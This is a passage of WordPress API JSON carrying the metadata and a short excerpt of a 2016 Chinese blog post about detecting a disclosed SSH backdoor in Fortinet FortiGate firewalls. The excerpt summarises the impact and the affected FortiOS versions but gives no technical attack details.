FortiiGate\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u662f\u7531Fortinet\uff08\u98de\u5854\uff09\u516c\u53f8\u63a8\u51fa\u7684\u7f51\u7edc\u9632\u706b\u5899\u4ea7\u54c1\uff0c\u5305\u62ec\u9ad8\u6027\u80fd\u6570\u636e\u4e2d\u5fc3\u9632\u706b\u5899\u548cNGFW\uff08\u4e0b\u4e00\u4ee3\u9632\u706b\u5899\uff09\u4ee5\u53caUTM\uff08 \u7edf\u4e00\u5a01\u80c1\u7ba1\u7406\uff09\u3002\u8fd9\u6b21\u66b4\u51fa\u6765\u7684\u662f\u4e00\u4e2assh\u540e\u95e8\uff0c\u653b\u51fb\u8005\u80fd\u5229\u7528\u6b64\u540e\u95e8\u76f4\u63a5\u83b7\u53d6Fortigate\u6700\u9ad8\u7ba1\u7406\u6743\u9650\uff0c\u53ef\u4ee5\u63a7\u5236\u8bbe\u5907\u8fdb\u884c\u6bd4\u5982\u6293\u53d6\u6d41\u91cf\u76d1\u542c\uff0cdns\u6b3a\u9a97\uff0c\u5efa\u7acb\u96a7\u9053\u8fdb\u5165\u4f01\u4e1a\u5185\u7f51\u7b49\u653b\u51fb\u884c\u4e3a\u3002 \u5f71\u54cd\u8303\u56f4 FortiOS 4.3.0-4.3....\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=159\" \/>\n<meta property=\"og:site_name\" content=\"Wayne's Blog\" \/>\n<meta property=\"article:published_time\" content=\"2016-01-15T09:24:14+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne's Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=159#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg\",\"contentUrl\":\"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=159#webpage\",\"url\":\"http:\/\/weizn.net\/?p=159\",\"name\":\"\\u98de\\u5854(FortiGate)SSH\\u540e\\u95e8\\u5168\\u7f51\\u68c0\\u6d4b - Wayne's Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=159#primaryimage\"},\"datePublished\":\"2016-01-15T09:24:14+00:00\",\"dateModified\":\"2016-01-15T09:24:14+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=159#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=159\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=159#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\\u98de\\u5854(FortiGate)SSH\\u540e\\u95e8\\u5168\\u7f51\\u68c0\\u6d4b\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=159#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=159#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"\\u98de\\u5854(FortiGate)SSH\\u540e\\u95e8\\u5168\\u7f51\\u68c0\\u6d4b\",\"datePublished\":\"2016-01-15T09:24:14+00:00\",\"dateModified\":\"2016-01-15T09:24:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=159#webpage\"},\"wordCount\":1150,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"image\":{\"@id\":\"http:\/\/weizn.net\/?p=159#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg\",\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=159#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b - Wayne's Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=159","og_locale":"zh_CN","og_type":"article","og_title":"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b - Wayne's Blog","og_description":"  \u6f0f\u6d1e\u6982\u8981 FortiiGate\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u662f\u7531Fortinet\uff08\u98de\u5854\uff09\u516c\u53f8\u63a8\u51fa\u7684\u7f51\u7edc\u9632\u706b\u5899\u4ea7\u54c1\uff0c\u5305\u62ec\u9ad8\u6027\u80fd\u6570\u636e\u4e2d\u5fc3\u9632\u706b\u5899\u548cNGFW\uff08\u4e0b\u4e00\u4ee3\u9632\u706b\u5899\uff09\u4ee5\u53caUTM\uff08 \u7edf\u4e00\u5a01\u80c1\u7ba1\u7406\uff09\u3002\u8fd9\u6b21\u66b4\u51fa\u6765\u7684\u662f\u4e00\u4e2assh\u540e\u95e8\uff0c\u653b\u51fb\u8005\u80fd\u5229\u7528\u6b64\u540e\u95e8\u76f4\u63a5\u83b7\u53d6Fortigate\u6700\u9ad8\u7ba1\u7406\u6743\u9650\uff0c\u53ef\u4ee5\u63a7\u5236\u8bbe\u5907\u8fdb\u884c\u6bd4\u5982\u6293\u53d6\u6d41\u91cf\u76d1\u542c\uff0cdns\u6b3a\u9a97\uff0c\u5efa\u7acb\u96a7\u9053\u8fdb\u5165\u4f01\u4e1a\u5185\u7f51\u7b49\u653b\u51fb\u884c\u4e3a\u3002 \u5f71\u54cd\u8303\u56f4 FortiOS 4.3.0-4.3....","og_url":"http:\/\/weizn.net\/?p=159","og_site_name":"Wayne's Blog","article_published_time":"2016-01-15T09:24:14+00:00","og_image":[{"url":"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"6 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne's Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"ImageObject","@id":"http:\/\/weizn.net\/?p=159#primaryimage","inLanguage":"zh-Hans","url":"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg","contentUrl":"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg"},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=159#webpage","url":"http:\/\/weizn.net\/?p=159","name":"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b - Wayne's Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"primaryImageOfPage":{"@id":"http:\/\/weizn.net\/?p=159#primaryimage"},"datePublished":"2016-01-15T09:24:14+00:00","dateModified":"2016-01-15T09:24:14+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=159#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=159"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=159#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=159#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=159#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b","datePublished":"2016-01-15T09:24:14+00:00","dateModified":"2016-01-15T09:24:14+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=159#webpage"},"wordCount":1150,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"image":{"@id":"http:\/\/weizn.net\/?p=159#primaryimage"},"thumbnailUrl":"http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg","articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=159#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/159","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=159"}],"version-history":[{"count":0,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/159\/revisions"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=159"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=159"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=159"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}